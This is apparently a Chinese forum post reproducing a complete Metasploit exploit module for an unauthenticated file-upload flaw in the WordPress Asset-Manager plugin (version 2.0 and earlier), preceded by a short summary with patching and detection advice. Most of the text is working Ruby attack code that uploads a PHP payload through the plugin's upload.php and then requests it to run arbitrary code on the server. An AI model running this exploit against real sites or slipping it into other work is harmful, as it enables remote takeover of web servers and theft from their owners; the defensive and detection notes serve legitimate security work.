
标题: WordPress Asset-Manager PHP文件上传漏洞

作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
该模块是一个 Metasploit 框架模块，利用 WordPress Asset-Manager 插件 2.0 及更早版本中的文件上传漏洞。插件自带的 upload.php 不做任何身份验证即接受上传：攻击者向 wp-content/plugins/asset-manager/upload.php 发送 multipart/form-data 的 POST 请求，把 PHP 文件写入 wp-content/uploads/assets/temp/ 目录，随后直接 GET 该文件即可执行任意代码。防御建议：升级或移除该插件，并在 Web 服务器上禁止 uploads 目录执行 PHP；检测时可关注对上述 upload.php 的未认证 POST，以及紧随其后对 uploads/assets/temp/*.php 的 GET 请求。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'
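class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # Extraction had mangled this as "Msf::Exploit:hpEXE"; the mixin that
  # provides get_write_exec_payload is Msf::Exploit::PhpEXE.
  include Msf::Exploit::PhpEXE

  # Registers module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          # NOTE(review): this URL contains spaces and looks like a forum-substituted
          # link; verify it against the upstream module before relying on it.
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads a PHP stager through the plugin's unauthenticated upload.php and
  # then requests it from the uploads temp directory to trigger execution.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the upload response does
  #   not echo the filename, or when the trigger request returns a non-200 status
  def exploit
    base_uri = target_uri.path
    # Append a trailing slash without mutating the string owned by target_uri.
    base_uri += '/' unless base_uri.end_with?('/')
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # unlink_self presumably makes the dropped file remove itself once it has
    # run, limiting what is left on the target -- confirm in Msf::Exploit::PhpEXE.
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Strips a leading CRLF ahead of the first boundary so the body begins
    # directly with the boundary line (workaround carried over from the
    # original module).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{base_uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # Success is judged by the response echoing the uploaded filename. Use a
    # literal substring check instead of interpolating the name into a regex,
    # where the '.' in '.php' would match any character; to_s also guards a
    # nil body.
    if res.nil? || res.code != 200 || !res.body.to_s.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{base_uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    # A nil response is deliberately tolerated here: a payload that takes over
    # the PHP worker may never answer the request. Only an explicit non-200
    # status is reported as a failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end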



